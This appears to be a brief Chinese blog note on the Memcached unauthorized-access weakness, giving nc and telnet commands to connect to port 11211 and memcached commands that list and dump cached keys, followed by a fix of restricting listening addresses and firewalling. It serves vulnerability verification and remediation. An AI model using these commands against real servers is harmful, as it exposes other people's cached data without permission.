memcached未授权

 

 

漏洞成因:

Memcached端口是对外开放的,用nc或Telne可以直接登录,查看信息,增加修改都可以。

nc -vv 1.2.3.4 11211

telnet 1.2.3.4 11211

 

 

验证读取key:

stats

stats items

stats cachedump 22 0

get kkkkkkkkkkkk

 

 

修复建议:

memcached设置监听内网或配置防火墙限制非必要的远程访问

 

 

 

相关文章:

  • 2022-12-23
  • 2021-11-10
  • 2021-10-19
  • 2021-09-26
  • 2021-11-27
  • 2022-02-26
  • 2022-02-11
  • 2021-05-21
猜你喜欢
  • 2021-08-26
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-11-09
  • 2021-11-08
  • 2021-08-30
相关资源
相似解决方案